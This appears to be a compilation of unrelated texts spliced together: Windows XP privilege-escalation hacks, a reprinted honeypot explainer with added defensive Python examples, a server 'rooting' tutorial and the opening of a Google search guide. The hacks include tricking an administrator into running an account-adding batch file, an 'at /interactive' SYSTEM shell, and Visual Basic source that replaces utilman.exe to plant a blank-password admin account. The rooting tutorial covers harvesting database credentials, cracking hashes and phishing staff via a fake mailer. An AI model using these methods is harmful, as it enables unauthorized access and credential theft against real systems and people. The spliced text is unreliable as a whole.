
Method 1:-

- Open Notepad -> type "net localgroup Administrators yourusername /add" (without the quotes)
- Make the admin log in to the computer -> make him run the file -> Congrats, you are admin


Method No. 2

- Log in to your XP box as a non-privileged user.
- Open up a command window (run cmd.exe)
- In that command window, have the system scheduler launch another command window.
- Type at 20:00 /interactive "cmd.exe" in the command prompt -> it will launch an interactive cmd with system privileges at 20:00 -> set the time just ahead of your clock
- When new window opens, kill explorer.exe in task manager.
- open explorer.exe
- Congrats, you're now running as the system user - you have more power than 'Administrator'!
- Now you can make yourself administrator by adding your name to Administrators group
- Type this in command prompt -> net localgroup Administrators yourusername /add


Method 3:-

- Boot in the Safe mode in XP
- Most of the time people have no password for the real Administrator account; they usually give admin privileges to another account
- Get in the administrator account


Method 4:-
- Boot from live CD of a linux/unix distro
-


Other methods

Exploits :- like


Registry Changes :-

1. Run Registry Editor (Regedt32.exe).

2. Perform the following steps on each of the registry keys
identified above:

A. On the Security menu, click Permissions.

B. Click "Replace Permissions on Existing Subkeys" so that it is selected.

C. Click Everyone, change the Type Of Access to Read, and then
click OK.

3. Exit Registry Editor.

from :- http://insecure.org/sploits/NT.startup_programs.bad_registry_perms.html



Resetting the admin password :-
With Boot Disk


With Windows XP Boot CD

1. Insert the Windows XP CD and start your computer (it's assumed here that your XP CD is bootable - as it should be - and that you have your BIOS set to boot from CD)

2. Keep your eye on the screen messages for booting to your CD; usually it will be "Press any key to boot from cd"

3. Begin the Windows Repair process.

4. During the reboot, do not make the mistake of "pressing any key" to boot from the CD again!

5. Keep your eye on the lower left hand side of the screen and when you see the Installing Devices progress bar, press SHIFT + F10. This is the security hole! A command console will now open up giving you the potential for wide access to your system.

From here you can run any Windows command and you'll have full administrator access. To reset the password you can use either of two ways:



1) Run NUSRMGR.CPL to get graphical interface

2) Run Compmgmt.msc to get Computer Management console. From there use Local User and Groups->Users



another method :-
Run Apps with admin privileges

Try running your code with Administrator privileges with the command "runas"

eg :- runas /env /user:Administrator "c:\WINDOWS\NOTEPAD.EXE"

It will run Notepad with Administrator privileges; similarly, run your code with admin privileges


1. Use sudowin. This is an open source project distributed under the BSD License (which is a very permissive license - an example of how permissive it is is the fact that for a long time parts of the Windows network stack were taken from an externally developed source code licensed under this license) written in .NET 2.0. What it does is give administrative credentials to the programs you want, but they will still run with your profile (meaning that they will see the same registry, the same desktop / my documents directory and so on). Another important difference is that you must enter your password to elevate privileges. It also contains both a GUI and a command line component. To install it, take the following steps:
Go to the website and download it (in a rather confusing move the download link is where it displays the version number, towards the upper middle of the page, currently it says 0.1.1-r95). If you didn't download anything from sourceforge.net until now, it will ask you to select a mirror.

2. You'll need the .NET framework 2.0. You can download it from the Microsoft site if you don't already have it (be sure to download the redistributable package, not the software development kit). Here is a direct link if you are running a 32 bit Intel or AMD machine. If you already have the .NET framework 1.0 or 1.1, it will prompt you during the installation and offer you the possibility to download and install the 2.0 version without interrupting the installation.

3. Install the software. Remember to do this from an account with administrative privileges (you can use the methods described earlier to run the installation with enough privileges).

4. Using a Notepad with administrative privileges, edit the sudoers.xml file located in the Server subdirectory of the install directory (this is C:\Program Files\sudowin by default or C:\Program Files (x86)\sudowin on 64 bit systems). Go to the users section and add the users you want to have sudo capabilities (remember to enter the names in the format of . If you are a home user, you can find out your complete name by entering whoami at the command prompt). Now go towards the end and enter the commands which you want to be able to run with elevated privileges. Also look around the file and change other settings to fit your needs. Save the file.

5. Use the command runas /user:Administrator "cmd /c start lusrmgr.msc" (assuming that Administrator is a user with administrative privileges to which you know the password) to display the user management console (anyone else finds the name funny?). Go to each user you want to be able to perform sudo and add them to the Sudoers group which was created by sudowin during the installation (you can do this by right clicking on them, clicking properties, going to the "Member of" tab, clicking Add, writing Sudoers and clicking Ok).

6. Use the command runas /user:Administrator "cmd /c start services.msc", find the sudowin service and restart it.


Haven't tested it myself; taken from :- http://hype-free.blogspot.com/2006/09/non-hacking-tutorial-on-elevating.html

One more Method:-

OK, here it is. Please post some input on what you think. Also I'm trying to figure out a better way to gain access to the NTFS partition. Any input welcomed!

Gain SYSTEM/Administrative Access to Windows XP/2000

I will explain how to gain Local Administrative rights to a Windows XP/2000 computer without removing or cracking a User's password. In order for this to work the Computer must have a CD-ROM drive, or other bootable device other than a hard drive.

(I'm stoned and it's 3:15a.m. so I hope this makes sense)

Overview:
Windows XP/2000 allows you to run a program with System level privileges before logging on. The name of the program is Utility Manager. It is located at C:\Windows\system32\utilman.exe for Windows XP and C:\WINNT\System32\utilman.exe for Windows 2000. So all you have to do is make your own program that creates an administrative account. The program that you create has to have a filename of Utilman.exe in order to work.

If the filesystem on the computer is FAT32 then this process is very simple and only takes a second. If the Computer uses the NTFS filesystem this will take a few minutes depending on how fast the PC is.


First we need to make the program
I used Visual Basic 6, here is my source code that I used to create the administrative account:


#################################START###############################
Private Sub Form_Load()
Shell "net user NewAdmin " & """""" & " /add", vbHide
Pause (1)
Shell "net localgroup administrators NewAdmin /add", vbHide
Pause (1)
msgbox "Added Administrative User",16,"Hacked XP"
End
End Sub

Sub Pause(interval)
'Pauses execution
Current = Timer
Do While Timer - Current < Val(interval)
DoEvents
Loop
End Sub
'#################################END###############################

Compile this with the filename of Utilman.exe; this is very important! What this program does is create a User named NewAdmin with a blank password and then adds them to the Administrators Group. Ok, now that we've made the program let's move on...

FAT32
1. Create a bootable floppy :: http://1gighost.net/keywest/boot98sc.exe
2. Add the newly made Utilman.exe to the Floppy
3. Restart the computer with the floppy in it
4. After DOS loads type C: and press enter.
5. If it changes from A:/> to C:/> then you're doing good
6. Use this command: Copy A:utilman.exe C:\windows\system32\utilman.exe and press Y to overwrite the existing file
7. Restart the computer without the floppy in it
8. When it gets to the Login Screen press the Windows Key + U
9. Restart the computer if Fast User Switching is enabled (the Graphical Login with the picture next to the login name, XP only); if not enabled skip to Step 10

9a. After restarting you should see a new user in the list named NewAdmin, click on this account and you just gained Administrative access to your PC.
10. After pressing Windows Key + U then type in the username NewAdmin and push Enter. That's it, you now have administrative access to your PC.


NTFS
Use a Windows 2000 Setup CD to gain access to the NTFS partition through the recovery console. From the recovery console you can copy over the hacked Utilman.exe. Once in the recovery console follow the same instructions as above from step 6. After copying over the file restart your computer by typing exit or pushing ALT CTRL DEL. Remove the Windows 2000 CD. When Windows loads to the choose user screen simply push Windows Key + U. After pushing the Windows Key + U you should see a message that says "Added Administrative User", restart the computer one last time then choose the NewAdmin user account. This will have Administrative Privileges. It works, I've done it and I hope you all enjoy this nice little hack ! ! ! (If you're trying to gain SYSTEM level access you can replace the UTILMAN.exe to open a Command Prompt)

LOL I hope that made sense

Honeypots
Definitions and Value of Honeypots



Honeypots are an exciting new technology with enormous potential for the security community. The concepts were first introduced by several icons in computer security, specifically Cliff Stoll in the book "The Cuckoo's Egg", and Bill Cheswick's paper "An Evening with Berferd." Since then, honeypots have continued to evolve, developing into the powerful security tools they are today. The purpose of this paper is to explain exactly what honeypots are, their advantages and disadvantages, and their value to security.

Definitions
The first step to understanding honeypots is defining what a honeypot is. This can be harder than it sounds. Unlike firewalls or Intrusion Detection Systems, honeypots do not solve a specific problem. Instead, they are a highly flexible tool that comes in many shapes and sizes. They can do everything from detecting encrypted attacks in IPv6 networks to capturing the latest in on-line credit card fraud. It is this flexibility that gives honeypots their true power. It is also this flexibility that can make them challenging to define and understand. As such, I use the following definition to define what a honeypot is.

A honeypot is an information system resource whose value lies in unauthorized or illicit use of that resource.


This is a general definition covering all the different manifestations of honeypots. We will be discussing in this paper different examples of honeypots and their value to security. All will fall under the definition we use above: their value lies in the bad guys interacting with them. Conceptually almost all honeypots work the same. They are a resource that has no authorized activity; they do not have any production value. Theoretically, a honeypot should see no traffic because it has no legitimate activity. This means any interaction with a honeypot is most likely unauthorized or malicious activity. Any connection attempts to a honeypot are most likely a probe, attack, or compromise. While this concept sounds very simple (and it is), it is this very simplicity that gives honeypots their tremendous advantages (and disadvantages). I highlight these below.

Advantages: Honeypots are a tremendously simple concept, which gives them some very powerful strengths.


* Small data sets of high value: Honeypots collect small amounts of information. Instead of logging one GB of data a day, they can log only one MB of data a day. Instead of generating 10,000 alerts a day, they can generate only 10 alerts a day. Remember, honeypots only capture bad activity; any interaction with a honeypot is most likely unauthorized or malicious activity. As such, honeypots reduce 'noise' by collecting only small data sets, but information of high value, as it is only the bad guys. This means it's much easier (and cheaper) to analyze the data a honeypot collects and derive value from it.

* New tools and tactics: Honeypots are designed to capture anything thrown at them, including tools or tactics never seen before.

* Minimal resources: Honeypots require minimal resources, they only capture bad activity. This means an old Pentium computer with 128MB of RAM can easily handle an entire class B network sitting off an OC-12 network.

* Encryption or IPv6: Unlike most security technologies (such as IDS systems) honeypots work fine in encrypted or IPv6 environments. It does not matter what the bad guys throw at a honeypot, the honeypot will detect and capture it.

* Information: Honeypots can collect in-depth information that few, if any other technologies can match.

* Simplicity: Finally, honeypots are conceptually very simple. There are no fancy algorithms to develop, state tables to maintain, or signatures to update. The simpler a technology, the less likely there will be mistakes or misconfigurations.



Disadvantages: Like any technology, honeypots also have their weaknesses. It is because of this they do not replace any current technology, but work with existing technologies.

# Limited view: Honeypots can only track and capture activity that directly interacts with them. Honeypots will not capture attacks against other systems, unless the attacker or threat interacts with the honeypots also.

# Risk: All security technologies have risk. Firewalls have the risk of being penetrated, encryption has the risk of being broken, IDS sensors have the risk of failing to detect attacks. Honeypots are no different, they have risk also. Specifically, honeypots have the risk of being taken over by the bad guy and being used to harm other systems. This risk varies for different honeypots. Depending on the type of honeypot, it can have no more risk than an IDS sensor, while some honeypots have a great deal of risk. We identify which honeypots have what levels of risk later in the paper.


It is how you leverage these advantages and disadvantages that defines the value of your honeypot (which we discuss later).

Types of Honeypots
Honeypots come in many shapes and sizes, making them difficult to get a grasp of. To help us better understand honeypots and all the different types, we break them down into two general categories, low-interaction and high-interaction honeypots. These categories help us understand what type of honeypot you are dealing with, its strengths, and weaknesses. Interaction defines the level of activity a honeypot allows an attacker. Low-interaction honeypots have limited interaction; they normally work by emulating services and operating systems. Attacker activity is limited to the level of emulation by the honeypot. For example, an emulated FTP service listening on port 21 may just emulate an FTP login, or it may support a variety of additional FTP commands. The advantage of low-interaction honeypots is their simplicity. These honeypots tend to be easier to deploy and maintain, with minimal risk. Usually they involve installing software, selecting the operating systems and services you want to emulate and monitor, and letting the honeypot go from there. This plug and play approach makes deploying them very easy for most organizations. Also, the emulated services mitigate risk by containing the attacker's activity; the attacker never has access to an operating system to attack or harm others. The main disadvantages of low-interaction honeypots are that they log only limited information and are designed to capture known activity. The emulated services can only do so much. Also, it's easier for an attacker to detect a low-interaction honeypot; no matter how good the emulation is, a skilled attacker can eventually detect their presence. Examples of low-interaction honeypots include Specter, Honeyd, and KFSensor.

High-interaction honeypots are different; they are usually complex solutions as they involve real operating systems and applications. Nothing is emulated, we give attackers the real thing. If you want a Linux honeypot running an FTP server, you build a real Linux system running a real FTP server. The advantages of such a solution are twofold. First, you can capture extensive amounts of information. By giving attackers real systems to interact with, you can learn the full extent of their behavior, everything from new rootkits to international IRC sessions. The second advantage is that high-interaction honeypots make no assumptions on how an attacker will behave. Instead, they provide an open environment that captures all activity. This allows high-interaction solutions to learn behavior we would not expect. An excellent example of this is how a Honeynet captured encoded back door commands on a non-standard IP protocol (specifically IP protocol 11, Network Voice Protocol). However, this also increases the risk of the honeypot, as attackers can use these real operating systems to attack non-honeypot systems. As a result, additional technologies have to be implemented that prevent the attacker from harming other non-honeypot systems. In general, high-interaction honeypots can do everything low-interaction honeypots can do and much more. However, they can be more complex to deploy and maintain. Examples of high-interaction honeypots include Symantec Decoy Server and Honeynets. You can find a complete listing of both low and high interaction honeypots at the Honeypot Solutions page. To better understand both low and high interaction honeypots let's look at two examples. We will start with the low-interaction honeypot Honeyd.

Honeyd: Low-interaction honeypot
Honeyd is a low-interaction honeypot. Developed by Niels Provos, Honeyd is OpenSource and designed to run primarily on Unix systems (though it has been ported to Windows). Honeyd works on the concept of monitoring unused IP space. Anytime it sees a connection attempt to an unused IP, it intercepts the connection and then interacts with the attacker, pretending to be the victim. By default, Honeyd detects and logs any connection to any UDP or TCP port. In addition, you can configure emulated services to monitor specific ports, such as an emulated FTP server monitoring TCP port 21. When an attacker connects to the emulated service, not only does the honeypot detect and log the activity, but it captures all of the attacker's interaction with the emulated service. In the case of the emulated FTP server, we can potentially capture the attacker's login and password, the commands they issue, and perhaps even learn what they are looking for or their identity. It all depends on the level of emulation by the honeypot. Most emulated services work the same way. They expect a specific type of behavior, and then are programmed to react in a predetermined way. If attack A does this, then react this way. If attack B does this, then respond this way. The limitation is that if the attacker does something that the emulation does not expect, then it does not know how to respond. Most low-interaction honeypots, including Honeyd, simply generate an error message. You can see what commands the emulated FTP server for Honeyd supports by reviewing the source code.
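To make the emulated-FTP behaviour concrete, here is an added example (not Honeyd's own script and not code from the original paper) of a low-interaction FTP emulation: it records the login, password and every command, answers a few known commands with canned replies, and returns an error for anything it does not expect. The reply strings, the `EVENTS` log, port 2121 and the `replay` helper are assumptions made for the illustration.

```python
import socketserver
import time

BANNER = "220 FTP server ready."
MAX_LINE = 512          # bound how much of each line the honeypot keeps
EVENTS = []             # in-memory log used by the network listener below
# The only post-login commands this emulation understands (assumed set).
CANNED = {
    "SYST": "215 UNIX Type: L8",
    "PWD": '257 "/" is current directory.',
    "NOOP": "200 NOOP command successful.",
}


class EmulatedFtpSession:
    """State for one connection. Nothing here touches a real file system or shell."""

    def __init__(self, peer, log):
        self.peer, self.log = peer, log
        self.user = None
        self.authed = False
        self.closed = False
        self._record("connect", "")

    def _record(self, kind, detail):
        self.log.append({"ts": time.time(), "peer": self.peer,
                         "kind": kind, "detail": detail})

    def handle(self, line):
        """Log one command line and return the predetermined reply."""
        line = line.rstrip("\r\n")[:MAX_LINE]
        verb, _, arg = line.partition(" ")
        verb = verb.upper()
        if verb == "USER":
            self.user = arg
            self._record("user", arg)
            return "331 Password required for %s." % arg
        if verb == "PASS" and self.user is not None:
            # Accept any password so the session continues and commands are captured.
            self.authed = True
            self._record("login", "%s:%s" % (self.user, arg))
            return "230 User %s logged in." % self.user
        self._record("command", line)
        if verb == "QUIT":
            self.closed = True
            return "221 Goodbye."
        if not self.authed:
            return "530 Please login with USER and PASS."
        if verb in CANNED:
            return CANNED[verb]
        # The limitation described above: unexpected input only gets an error.
        return "500 '%s': command not understood." % verb


def replay(lines, peer="203.0.113.9"):
    """Feed a constructed transcript through a session; return (replies, log)."""
    log, replies = [], []
    session = EmulatedFtpSession(peer, log)
    for line in lines:
        replies.append(session.handle(line))
        if session.closed:
            break
    return replies, log


class FtpHoneypotHandler(socketserver.StreamRequestHandler):
    timeout = 60  # drop idle connections

    def handle(self):
        session = EmulatedFtpSession(self.client_address[0], EVENTS)
        try:
            self.wfile.write((BANNER + "\r\n").encode("latin-1"))
            while not session.closed:
                raw = self.rfile.readline(MAX_LINE + 2)
                if not raw:
                    break
                reply = session.handle(raw.decode("latin-1"))
                self.wfile.write((reply + "\r\n").encode("latin-1"))
        except OSError:
            pass  # timeout or reset; what was seen so far is already logged


if __name__ == "__main__":
    # Constructed transcript, then a listener on an unprivileged local port.
    for reply in replay(["USER admin\r\n", "PASS letmein\r\n", "SITE EXEC x\r\n"])[0]:
        print(reply)
    with socketserver.ThreadingTCPServer(("127.0.0.1", 2121), FtpHoneypotHandler) as srv:
        srv.serve_forever()
```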

Some honeypots, such as Honeyd, can not only emulate services, but emulate actual operating systems. In other words, Honeyd can appear to the attacker to be a Cisco router, WinXP webserver, or Linux DNS server. There are several advantages to emulating different operating systems. First, the honeypot can better blend in with existing networks if the honeypot has the same appearance and behavior as production systems. Second, you can target specific attackers by providing systems and services they often target, or systems and services you want to learn about. There are two elements to emulating operating systems. The first is with the emulated services. When an attacker connects to an emulated service, you can have that service behave like and appear to be a specific OS. For example, if you have a service emulating a webserver, and you want your honeypot to appear to be a Win2000 server, then you would emulate the behavior of an IIS webserver. For Linux, you would emulate the behavior of an Apache webserver. Most honeypots emulate OSs in this manner. Some sophisticated honeypots take this emulation one step farther (as Honeyd does). Not only do they emulate at the service level, but at the IP stack level. If someone uses active fingerprinting measures to determine the OS type of your honeypot, most honeypots respond with the IP stack of whatever OS the honeypot is installed on. Honeyd spoofs the replies, making not only the emulated services, but emulated IP stacks behave as the operating systems would. The level of emulation and sophistication depends on what honeypot technology you choose to use.

Honeynets: High-interaction honeypot
Honeynets are a prime example of a high-interaction honeypot. Honeynets are not a product; they are not a software solution that you install on a computer. Instead, Honeynets are an architecture, an entire network of computers designed to be attacked. The idea is to have an architecture that creates a highly controlled network, one where all activity is controlled and captured. Within this network we place our intended victims, real computers running real applications. The bad guys find, attack, and break into these systems on their own initiative. When they do, they do not realize they are within a Honeynet. All of their activity, from encrypted SSH sessions to emails and file uploads, is captured without them knowing it. This is done by inserting kernel modules on the victim systems that capture all of the attacker's actions. At the same time, the Honeynet controls the attacker's activity. Honeynets do this using a Honeywall gateway. This gateway allows inbound traffic to the victim systems, but controls the outbound traffic using intrusion prevention technologies. This gives the attacker the flexibility to interact with the victim systems, but prevents the attacker from harming other non-Honeynet computers. An example of such a deployment can be seen in Figure 1.

Value of Honeypots
Now that we have an understanding of two general categories of honeypots, we can focus on their value. Specifically, how we can use honeypots. Once again, we have two general categories: honeypots can be used for production purposes or research. When used for production purposes, honeypots are protecting an organization. This would include preventing, detecting, or helping organizations respond to an attack. When used for research purposes, honeypots are being used to collect information. This information has different value to different organizations. Some may want to be studying trends in attacker activity, while others are interested in early warning and prediction, or law enforcement. In general, low-interaction honeypots are often used for production purposes, while high-interaction honeypots are used for research purposes. However, either type of honeypot can be used for either purpose. When used for production purposes, honeypots can protect organizations in one of three ways: prevention, detection, and response. We will take a more in-depth look at how a honeypot can work in all three.

Honeypots can help prevent attacks in several ways. The first is against automated attacks, such as worms or auto-rooters. These attacks are based on tools that randomly scan entire networks looking for vulnerable systems. If vulnerable systems are found, these automated tools will then attack and take over the system (with worms self-replicating, copying themselves to the victim). One way that honeypots can help defend against such attacks is slowing their scanning down, potentially even stopping them. Called sticky honeypots, these solutions monitor unused IP space. When probed by such scanning activity, these honeypots interact with and slow the attacker down. They do this using a variety of TCP tricks, such as a window size of zero, putting the attacker into a holding pattern. This is excellent for slowing down or preventing the spread of a worm that has penetrated your internal organization. One such example of a sticky honeypot is LaBrea Tarpit. Sticky honeypots are most often low-interaction solutions (you can almost call them 'no-interaction solutions', as they slow the attacker down to a crawl). Honeypots can also protect your organization from human attackers. The concept is deception or deterrence. The idea is to confuse an attacker, to make him waste his time and resources interacting with honeypots. Meanwhile, your organization has detected the attacker's activity and has the time to respond and stop the attacker. This can even be taken one step farther. If an attacker knows your organization is using honeypots, but does not know which systems are honeypots and which systems are legitimate computers, they may be concerned about being caught by honeypots and decide not to attack your organization. Thus the honeypot deters the attacker. An example of a honeypot designed to do this is Deception Toolkit, a low-interaction honeypot.

The second way honeypots can help protect an organization is through detection. Detection is critical; its purpose is to identify a failure or breakdown in prevention. Regardless of how secure an organization is, there will always be failures, if for no other reason than humans are involved in the process. By detecting an attacker, you can quickly react to them, stopping or mitigating the damage they do. Traditionally, detection has proven extremely difficult to do. Technologies such as IDS sensors and system logs have proven ineffective for several reasons. They generate far too much data, a large percentage of false positives, cannot detect new attacks, and cannot work in encrypted or IPv6 environments. Honeypots excel at detection, addressing many of these problems of traditional detection. Honeypots reduce false positives by capturing small data sets of high value, capture unknown attacks such as new exploits or polymorphic shellcode, and work in encrypted and IPv6 environments. You can learn more about this in the paper Honeypots: Simple, Cost Effective Detection. In general, low-interaction honeypots make the best solutions for detection. They are easier to deploy and maintain than high-interaction honeypots and have reduced risk.
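The detection idea, that any connection to address space with no production use is worth an alert, can be shown with a short added example (not from the original paper or any honeypot product). It filters constructed connection records down to those aimed at unused addresses and summarizes them per source; the record format, the documentation-range addresses and the sweep threshold are assumptions.

```python
import ipaddress
from collections import defaultdict

# Constructed sample records: "timestamp source destination protocol dest-port"
SAMPLE_FLOWS = """\
2003-05-01T10:00:01 198.51.100.7 192.0.2.10 tcp 80
2003-05-01T10:00:02 198.51.100.7 192.0.2.25 tcp 25
2003-05-01T10:00:05 203.0.113.44 192.0.2.50 tcp 21
2003-05-01T10:00:05 203.0.113.44 192.0.2.51 tcp 21
2003-05-01T10:00:06 203.0.113.44 192.0.2.52 tcp 21
2003-05-01T10:00:09 203.0.113.90 192.0.2.77 udp 1434
2003-05-01T10:00:12 2001:db8:ffff::5 2001:db8::1f tcp 22
2003-05-01T10:00:15 198.51.100.7 192.0.2.10 tcp 443
""".splitlines()


def parse_flow(line):
    """Split one record of the assumed five-field format into typed values."""
    ts, src, dst, proto, dport = line.split()
    return ts, ipaddress.ip_address(src), ipaddress.ip_address(dst), proto, int(dport)


def honeypot_alerts(lines, monitored_nets, production_hosts, sweep_threshold=3):
    """Return one alert per source that touched an unused address.

    monitored_nets   -- networks the sensor watches (IPv4 and/or IPv6)
    production_hosts -- addresses inside those networks that have real services
    """
    nets = [ipaddress.ip_network(n) for n in monitored_nets]
    in_use = {ipaddress.ip_address(h) for h in production_hosts}
    seen = defaultdict(lambda: {"targets": set(), "ports": set(),
                                "first_seen": None, "flows": 0})
    for line in lines:
        if not line.strip():
            continue
        ts, src, dst, _proto, dport = parse_flow(line)
        if dst in in_use or not any(dst in n for n in nets):
            continue  # production or out-of-scope traffic is not honeypot data
        entry = seen[str(src)]
        entry["targets"].add(dst)
        entry["ports"].add(dport)
        entry["flows"] += 1
        if entry["first_seen"] is None:
            entry["first_seen"] = ts
    alerts = []
    for src in sorted(seen):
        e = seen[src]
        alerts.append({
            "src": src,
            # Several unused addresses from one source suggests scanning.
            "kind": "sweep" if len(e["targets"]) >= sweep_threshold else "probe",
            "targets": len(e["targets"]),
            "ports": sorted(e["ports"]),
            "first_seen": e["first_seen"],
            "flows": e["flows"],
        })
    return alerts


if __name__ == "__main__":
    for alert in honeypot_alerts(SAMPLE_FLOWS,
                                 ["192.0.2.0/24", "2001:db8::/64"],
                                 ["192.0.2.10", "192.0.2.25"]):
        print(alert)
```

The three records sent to the production web and mail hosts produce no output at all, which is the "small data sets of high value" property: only the five records aimed at unused addresses are reported.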

The third and final way a honeypot can help protect an organization is in response. Once an organization has detected a failure, how do they respond? This can often be one of the greatest challenges an organization faces. There is often little information on who the attacker is, how they got in, or how much damage they have done. In these situations detailed information on the attacker's activity is critical. There are two problems compounding incident response. First, often the very systems compromised cannot be taken offline to analyze. Production systems, such as an organization's mail server, are so critical that even though it's been hacked, security professionals may not be able to take the system down and do a proper forensic analysis. Instead, they are limited to analyzing the live system while still providing production services. This cripples the ability to analyze what happened, how much damage the attacker has done, and even if the attacker has broken into other systems. The other problem is that even if the system is pulled offline, there is so much data pollution it can be very difficult to determine what the bad guy did. By data pollution, I mean there has been so much activity (users logging in, mail accounts read, files written to databases, etc.) it can be difficult to determine what is normal day-to-day activity, and what is the attacker. Honeypots can help address both problems. Honeypots make an excellent incident response tool, as they can quickly and easily be taken offline for a full forensic analysis, without impacting day-to-day business operations. Also, the only activity a honeypot captures is unauthorized or malicious activity. This makes hacked honeypots much easier to analyze than hacked production systems, as any data you retrieve from a honeypot is most likely related to the attacker. The value honeypots provide here is quickly giving organizations the in-depth information they need to rapidly and effectively respond to an incident.
In general, high-interaction honeypots make the best solution for response. To respond to an intruder, you need in-depth knowledge on what they did, how they broke in, and the tools they used. For that type of data you most likely need the capabilities of a high-interaction honeypot.

Up to this point we have been talking about how honeypots can be used to protect an organization. We will now talk about a different use for honeypots, research. Honeypots are extremely powerful: not only can they be used to protect your organization, but they can be used to gain extensive information on threats, information few other technologies are capable of gathering. One of the greatest problems security professionals face is a lack of information or intelligence on cyber threats. How can we defend against an enemy when we don't even know who that enemy is? For centuries military organizations have depended on information to better understand who their enemy is and how to defend against them. Why should information security be any different? Research honeypots address this by collecting information on threats. This information can then be used for a variety of purposes, including trend analysis, identifying new tools or methods, identifying attackers and their communities, early warning and prediction, or motivations. One of the most well known examples of using honeypots for research is the work done by the Honeynet Project, an all volunteer, non-profit security research organization. All of the data they collect is with Honeynets distributed around the world. As threats are constantly changing, this information is proving more and more critical.

Getting Started
If you have never worked with honeypots before and want to learn more, I recommend starting with simple low-interaction honeypots, such as KFSensor or Specter for Windows users, or Honeyd for Unix users. There is even a Honeyd Linux Toolkit for easy deployment of Honeyd on Linux computers. Low-interaction honeypots have the advantage of being easier to deploy and carrying little risk, as they contain the activity of the attacker. Once you have had an opportunity to work with low-interaction solutions, you can take the skills and understanding you have developed and work with high-interaction solutions. To help you better understand honeypots, below is a chart summarizing what we just covered.

Low-interaction
Solution emulates operating systems and services.

* Easy to install and deploy. Usually requires simply installing and configuring software on a computer.
* Minimal risk, as the emulated services control what attackers can and cannot do.
* Captures limited amounts of information, mainly transactional data and some limited interaction.

High-interaction
No emulation, real operating systems and services are provided.

* Can capture far more information, including new tools, communications, or attacker keystrokes.
* Can be complex to install or deploy (commercial versions tend to be much simpler).
* Increased risk, as attackers are provided real operating systems to interact with.


Finally, no paper on honeypots would be complete without a discussion about legal issues. There are many misconceptions about the legal issues of honeypots. Instead of briefly covering the legal issues in this paper, I will be releasing a new paper at the end of May, 2003 dedicated to the legal issues of honeypot technologies.

Conclusion
The purpose of this paper was to define what honeypots are and their value to the security community. We identified two different types of honeypots, low-interaction and high-interaction honeypots. Interaction defines how much activity a honeypot allows an attacker. The value of these solutions is both for production or research purposes. Honeypots can be used for production purposes by preventing, detecting, or responding to attacks. Honeypots can also be used for research, gathering information on threats so we can better understand and defend against them. If you are interested in learning more about honeypots, you may want to consider the book Honeypots: Tracking Hackers, the first and only book dedicated to honeypot technologies.


http://www.tracking-hackers.com
http://www.tracking-hackers.com/papers/honeypots.html






In this video I illustrate the WinnerTweak SE bug. Access from the CLI. Protected folder with password bypassed very easily :)

The highest access you can gain on any *nix based operating system is
root. On this account you can do many things that you can't with any
other account! In this tutorial I will explain how to gain access to
this account by just using your eyes.

The biggest weakness in any system is the stupid bugger that is running
it. They are prone to write things down that they should not, use the
same password for everything and configure things wrong.
So keeping that in mind, let's look around the server.

You are looking for things such as mysql connection scripts. These are named things like config.php, configure.php, db.php and db_connect.php. Look at these and they will usually have the connection details to that user's mysql account!

If this is a hosting company, you are not really that interested
in the many users that only have minimal permissions over their own
sites; you are interested in the webhost's site.

So execute the command “cat /etc/passwd” (without the quotes) and then look for an entry with normally the first eight letters of the hosting company’s domain. Then with your shell navigate to their directory. Then go to their site and
have a look around. There will most probably be an automatic account
creation script or control panel login script on their main site.

You will need to make note of the directory that the script is in and then
go back to your shell. Now navigate to the directory and look for files
that may contain details to the hosting database. If the server owner is
as stupid as they come, this will be the connection details for root
mysql, which means you have control over all databases on the server; if
not, you can just connect to the accounts database.

If the server owner is stupid, the passwords will be stored in plain text. This means
that you have access to all accounts on the server! Now on with the
rooting: we need to find the admin’s password. If it is stored in the
database with the accounts, that is us done: just log in through the
control panel and you have root cp on the server.

There are different approaches if the host is not set up like this! Most
hosts have support forums these days, and all mainstream
forum software saves the database password in plain text, so we
can be sure we will be able to connect to that. If they are using phpbb,
which many are, hashes are unsalted, which means you can use any regular
md5 cracker to gain the plain text of the hash.

Now download putty if you are on windows or if you are in linux use ssh -l root and try the password that he uses on the forums. If you can’t crack it or it is not the same, next we have to look around again. Most hosts like to back up
their stuff so that if things go wrong they can restore what they have.
Well, to do this scripts need passwords, so look for mysql and ftp backup
scripts and test the passwords they contain.

If all this fails you have one last ace in your hand. Social engineering! This can be done many ways and I am not going to explain it now, but all I'm going to say is that in your travels around his server you should have gained a lot of
information about him, so try out different things such as emailing other
members of the team from a fake mailer saying that he is going away and
needs the password to his account on the control panel sent to his
private email address and so on.

I would tell you about local root exploitation but then that would not be using
your eyes would it!

If all this fails go look for another server!

Before we begin, I strongly recommend reading through http://www-db.stanford.edu/~backrub/google.html
#This article will help you understand the inner workings of a search engine (if you're not already ereet)
#I added a copy of this article to the end of this text, so just scroll down a little ways :)


What is this tutorial about?

-It's about using google to get the information you need, fast

Why should I read it?

-Because at the end of this tutorial, you'll be able to use google to find WHATEVER you need!

Why are you writing it?

-Because all of the ereet programmers at irc.smart-dev.com/irc.zoite.net are tired of people asking us questions,
when they could just ask lord google

Do I need to gather any tools for this tutorial?

-A web browser (i.e. lynx, mozilla), and confidence in the fact that you aren't inept



Now the 'tutorial'

Google is the shit. You can find virtually ANYTHING you want with it. "©2003 Google - Searching 3,083,324,652 web
pages" as of Sunday, February 16, 2003! I use google for pretty much anything. Any question you have can be answered
90% of the time in the first 20 results, if you search properly. In the next few sections I will be going over some
basic/advanced/UBER COOL techniques for searching.


I.Getting started

-Open your web browser, and go to www.google.com (if it isn't your homepage, which it should be!)
-Now, click on preferences- Most of this should be fine preset, but make sure you fill in the "do not filter my
search results," and select 100 results per page from the drop down menu, then fill in the last bubble (if that's
your thing). Click save preferences (note: they will only be saved if you have cookies enabled).

-Now that you have everything set up, let's see everything google has to offer (because google has a slew of useful
tools). First there's the web search, which is the topic of this article. After that there's the image search, which
is pretty useful if you want to find a picture of someone you know (I will go into detail later on), or if you just
want to find some free porn! Sicko. Next up: Groups. I LOVE this feature! You can search years, and years, and years,
of posts on USENET discussion boards. I have gotten SO much valuable information (mostly stuff to help me crack my
target) just by using this feature. I will also go in depth on this feature as well. Next to last: Directory searching.
This is pretty useful if you want to find information on a TOPIC. For instance if you wanted to do a biology project
on genetic disorders you would use this. Last up: News. This is a fairly new feature, added a few months ago. It
tells you how recent articles are (by the hour, pretty cool!). You can look at world news on World, U.S., business,
Science/Tech, Sports, Entertainment, and Health.

II.Google for Web searches
(BASIC)
-Well, you've got a broad sense of what google does, so let's get right into the specifics! I can hardly wait!

A. Deciding on keywords
-Try specific keywords first (i.e. search for elephant as opposed to animals)
